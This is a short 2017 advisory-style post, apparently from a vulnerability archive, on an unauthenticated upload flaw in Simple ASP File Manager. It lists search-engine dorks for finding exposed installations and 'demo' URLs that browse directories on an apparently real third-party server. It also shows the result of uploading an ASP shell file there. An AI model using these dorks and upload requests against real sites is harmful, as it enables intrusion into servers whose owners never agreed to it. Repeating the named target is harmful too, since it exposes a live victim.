Simple ASP Filemanager upload shell

Published
Credit
Risk
2017.07.10
anonymous-iran
Medium
CWE
CVE
Local
Remote
N/A
N/A
No
Yes
Dork: inurl:safm.asp ext:asp

[+] test : windows 10
[+] Website: www.anonymous-team.com

[+] source code : https://github.com/windylea/simple-asp-file-manager

dork:
inurl:safm.asp ext:asp
intitle:"ASP File Browser" ext:asp



After checking, no password has been added

After your search, you're gonna have the ability to do it in your tag. Upload file and .....

demo :
http://www.asycuda.org/wnfiles/mad.asp?browse=E:%5Cinetpub%5Cnewasy%5C_ScriptLibrary%5C
http://www.asycuda.org/wnfiles/mad.asp?browse=E:%5Cinetpub%5Cnewasy%5Cupltest%5C
http://www.asycuda.org/wnfiles/mad.asp?browse=E:%5Cinetpub%5Cnewasy%5Cbookresource%5C

asp shell upload
http://www.asycuda.org/wnfiles/mad.asp?upload=E%3A%5Cinetpub%5Cnewasy
Uploaded File: E:\inetpub\newasy\pouya.asp
Content Type: application/octet-stream


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com